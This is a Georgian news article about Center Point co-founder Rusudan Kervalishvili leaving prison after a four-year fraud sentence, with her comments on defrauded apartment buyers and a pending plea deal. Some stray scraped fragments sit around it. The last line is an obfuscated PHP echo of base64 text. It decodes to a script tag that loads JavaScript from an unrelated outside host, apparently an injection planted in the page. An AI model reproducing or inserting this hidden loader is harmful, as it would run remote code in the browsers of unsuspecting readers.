celsiusi
ავერსი საქკაბელი
მე ჩემი გული დავტოვე სასჯელაღსრულების დაწესებულებაში, რადგან ჩემი და, მაია რჩეულიშვილი ჯერჯერობით კიდევ პატიმრობაშია. პირველი ემოცია? თავისუფლების ფასი არაფერია. აქ თავისუფლებას ვგრძნობდი ჩიტების ფრენით, იმიტომ, რომ აქ ძალიან ბევრი ჩიტია, - ამის შესახებ საპატიმრო დაწესებულების დატოვების შემდეგ რუსუდან კერვალიშვილმა ჟურნალისტებს განუცხადა.
 
მისი თქმით, ბოლომდე თავისუფალი და ბედნიერი მაშინ იქნება, როცა მათი კომპანიის მშენებლობით დაზარალებულები დაკმაყოფილდებიან.
 
„რა თქმა უნდა, განცდა ძალიან ბევრი მაქვს. ერთი - მაქვს სინანული, რომ ის ადამიანები, ვინც ჩვენ გვენდო წლების განმავლობაში, დაზარალდნენ ჩვენთან ერთად. სამწუხაროდ, ჯერ კიდევ არ მოხერხდა, მიუხედავად იმისა, რომ 5 წელიწადია მაია აქ არის და მე 4 წელი, რომ პრობლემა დასრულდეს. ახლა იმედი მოგვეცა, რომ მშენებლობა ერთ თვეში დაიწყება მერიასთან ერთად. ჩვენი ამოცანა ერთია - ყველა ადამიანი ბედნიერი იყოს და შევიდეს თავის ბინაში და მიიღოს თავისი ქონება. მხოლოდ ამის მერე ვიქნებით მართლა თავისუფლები და ბედნიერები... პროცესში ჩაერთვება მაია. მე ძალიან ბევრი წელია ჩამოშორებული ვარ პროცესიდან. 2007 წლიდან აღარ ვყოფილვარ კომპანიაში, მაგრამ ყველფერში გვერდით დავუდგები, ყველასთან ვთანამშრომლობთ, პირველ რიგში, მერიასთან მაია თანამშრომლობს, პროკურატურასთან ვთანამშრომლობთ და შესაბამისად საპროცესო გარიგებას ველოდებით“, - განაცხადა რუსუდან კერვალიშვილმა.
 
როგორც მან აღნიშნა, საპროცესო გარიგების პირობა იქნება შემდეგი: უნდა დასრულდეს ყველა მშენებლობა.
 
„ყველაფერი გადაეცა ინვესტორებს, რა ქონებაც არსებობს. შესაბამისად, გადაეცემათ ფული, ასევე კომპანიიდან და მერიის დახმარებით. ამ ერთობლივი მუშაობის შედეგად სხვადასხვა კომპანია დაამთავრებს დასამთავრებელ მშენებლობას. მაია არის ის ადამიანი, ვის გარეშეც შეუძლებელია ეს საქმე დასრულდეს. ამიტომ, მისი აქ ყოფნა 5 წელი იყო მხოლოდ მუშაობა ამ საკითხებთან დაკავშირებით. მისი სათქმელი არის ის, რომ რაც შეიძლება ჩქარა მისცენ საშუალება, ჩაერთოს პროცესში და და დაასრულოს ეს პროცესი“, - განაცხადა კერვალიშვილმა.
 
„ცენტრ პოინტის“ ერთ-ერთმა დამფუძნებელმა რუსუდან კერვალიშვილმა პენიტენციური დაწესებულება დატოვა. მას რუსთავის ქალთა მე-5 დაწესებულებასთან ოჯახის წევრები და ახლობლები დახვდნენ. კერვალიშვილმა 4-წლიანი სასჯელი სრულად მოიხადა.
 
ცნობისთვის, რუსუდან კერვალიშვილი „ცენტრ პოინტის“ კიდევ ერთ დამფუძნებელთან და ხელმძღვანელთან, მაია რჩეულიშვილთან ერთად დამნაშავედ არის ცნობილი თაღლითობისა და მენაშენეთა კუთვნილი თანხების მითვისებაში.
1218
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");